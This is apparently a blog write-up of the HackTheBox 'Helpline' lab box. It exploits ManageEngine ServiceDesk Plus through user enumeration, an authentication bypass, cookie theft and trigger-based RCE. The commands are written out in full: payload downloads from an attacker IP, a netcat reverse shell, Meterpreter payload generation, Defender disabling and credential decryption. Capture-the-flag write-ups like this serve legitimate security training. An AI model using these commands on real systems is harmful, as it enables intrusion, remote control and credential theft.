+++
date = 2019-08-16T13:30:30-04:00
images = ""
tags = ["hackthebox","helpline","powershell","htb","writeups","web","ManageEngine","python","exploit"]
title = "HTB - Helpline"
+++

This post is a write-up for the Helpline box on [hackthebox.eu](https://www.hackthebox.eu)
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/Cp5mzYDbH8zu2YeS_hmfla5.png" alt="" caption="" class="cld-responsive">

### Enumeration
Start by enumerating the ports on the machine. Run `nmap` and document the result:
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/L1VMcpNDKVwn1TBD_p7xqpy.png" alt="" caption="Nmap on 10.10.10.132 with scripts" class="cld-responsive">

`Nmap` discovers that ports 135, 445, 8080 and 5985 are open. Ports 8080 and 5985 looks interesting.
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/pGlQr44wZXMzlROW_bqfg8w.png" alt="" caption="ManageEngine ServiceDesk on port 8080" class="cld-responsive">

Browsing to the website on port 8080, we find ManageEngine Service Desk Plus v9.3. A quick Google search finds quite a few interesting exploits. Since we have some time, let's start trying each one and see what we can get.

1. [ManageEngine ServiceDesk Plus 9.0 - User Enumeration](https://www.exploit-db.com/exploits/35891)
This exploit can fuzzing “domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&search=XXXX”, which will give different results (initially an existing domain) if a user exists or not.

Run the following `Wfuzz` command to get a list of usernames:
```
wfuzz -c -Z -z file,/usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt 'http://10.10.10.132:8080/domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&search=FUZZ'
```
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/k20R2TBroV2KuZzA_l6ufm7.png" alt="" caption="Wfuzz usernames" class="cld-responsive">

Fire up BurpSuite and verify some usernames:
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/DoUsA9wVpvt3JD3s_btxsua.png" alt="" caption="" class="cld-responsive">
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/BqfEf4rWMPTdwm9t_sd84hn.png" alt="" caption="" class="cld-responsive">

Two users are verified, unfortunately no domain leak:
- `guest`
- `administrator`

1. [ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass](https://www.exploit-db.com/exploits/42037)
This exploit can bypass authentication using a valid username and the same username as a password on `/mc/` (mobile client). Then you can keep those credentials, and delete `/mc/`from the URL.

The exploit works great for `**guest**`, but not for `administrator`.
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/1k1E1Qvs0I6LBmQx_vd1fyr.png" alt="" caption="Authenticating as guest" class="cld-responsive">

1. [Manage Engine ServiceDesk Plus 10.0 - Privilege Escalation](https://www.exploit-db.com/exploits/46659)
This exploit can steal other user’s cookies via `WOListView.do`. Download the exploit, modify `host` parameter, and remove line 5 (comments about authors) to bypass problems about encoding.
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/pC0GWUgbY8G2Cvuw_zmzro0.png" alt="" caption="Manage Engine ServiceDesk Plus 10.0 - Privilege Escalation" class="cld-responsive">

Run the exploit and note the outputted cookies:
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/MBvULMbCS0jrmOVi_nfdctn.png" alt="" caption="Administrator cookies" class="cld-responsive">

Paste the outputted cookies into the web browser's Cookie Manager, and you should gain administrator privileges on ManageEngine ServiceDesk.
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/7M6llqXUQa2vryEV_g46dtf.png" alt="" caption="Administrator cookies in browser" class="cld-responsive">
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/ztmbdmkeh7qUw5sO_nu5s5t.png" alt="" caption="Administrator Session" class="cld-responsive">

RCE can be obtained by using the functionality available by default in `Helpdesk>Custom triggers`, which is triggered by `Requests > New Incident`:
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/bNLxpqEkIj21Z6td_ezsuay.png" alt="" caption="Custom Trigger" class="cld-responsive">

Create a new request to trigger the custom trigger:
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/o9nPx5ggCcQb21T7_ozth4l.png" alt="" caption="New Request" class="cld-responsive">

Run `tcpdump -i tun0 icmp -vvv` and receive a valid RCE:
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/h7vGFCdaH6l4z18w_jznags.png" alt="" caption="ICMP traffic" class="cld-responsive">

### Exploiting the RCE
Using the same process, create 2 custom triggers with the following execute commands:
```
cmd /c curl http://10.10.14.248:8081/nc64.exe -o C:\Windows\System32\spool\drivers\color\nc64.exe
```

```
cmd /c C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.248 1234 -e powershell.exe
```

After catching the reverse shell, run the following command to search the system log files:
```
(get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessName';expression={ $_.Properties[5].Value }}, @{name='CommandLine';expression={$_.Properties[8].Value }}).commandline
```
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/kYR6trTapbygMGgz_pidcy4.png" alt="" caption="RCE to Reverse Shell" class="cld-responsive">

At this point it is a good idea to pop a more persistent Meterpreter shell. I like to use [GreatSCT](https://github.com/GreatSCT/GreatSCT). Clone the repo and then run the following to install and create a payload:
```
./setup.sh -c
cd ..
python3 GreatSCT.py
use Bypass
list
use msbuild/meterpreter/rev_tcp.py
set LHOST 10.0.0.1
set LPORT 1235
generate
cp /usr/share/greatsct-output/source/abc1231.xml ~/abc1231.xml
```

Setup the Meterpreter listener on the attacking machine:
```
msfconsole -r /usr/share/greatsct-output/handlers/abc1231.rc
```

Run the following on the victim machine to launch the connection:
```
curl http://10.10.14.248:8081/abc1231.xml -o C:\ProgramData\abc1231.xml
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\ProgramData\abc1231.xml
```

### Getting User

After catching the Meterpreter shell, we know that user.txt is encrypted, so use the following commands to drop into powershell and decrypt the file:
```
meterpreter> shell
C:\ProgramData>powershell
PS C:\ProgramData> $user = 'HELPLINE\tolu'; $pw='!zaq1234567890pl!99'; $secpw=ConvertTo-SecureString $pw -AsPlainText -Force; $cred= New-Object System.Management.Automation.PSCredential $user,$secpw; Invoke-Command -ComputerName HELPLINE -Credential $cred -Authentication credssp -ScriptBlock {type C:\users\tolu\desktop\user.txt}
```
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/TzDVgwBOkZxoVutc_te1ji5.png" alt="" caption="user.txt" class="cld-responsive">

### Getting Root

In the same Meterpreter shell, run the following to disable Windows Defender:
```
Set-MpPreference -DisableRealtimeMonitoring $true
```

Run each line one a time to decrypt the admin-pass.xml file in a similar way to the user.txt process:
```
$User = "Helpline\Administrator"
$File = "admin-pass.xml"
$MyCredential=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User, (Get-Content $File | ConvertTo-SecureString)
Invoke-Command -ComputerName HELPLINE -Credential $MyCredential -Authentication credssp -ScriptBlock {whoami}
Invoke-Command -ComputerName HELPLINE -Credential $MyCredential -Authentication credssp -ScriptBlock {type C:\Users\Administrator\Desktop\root.txt}
```
<img data-src="https://res.cloudinary.com/dvi2dcepy/image/upload/w_auto,c_scale,f_auto,q_auto/v1577459287/chadporter.net/HTB/Helpline/E8tZJrCAZcSsFY4U_flvk88.png" alt="" caption="user.txt" class="cld-responsive">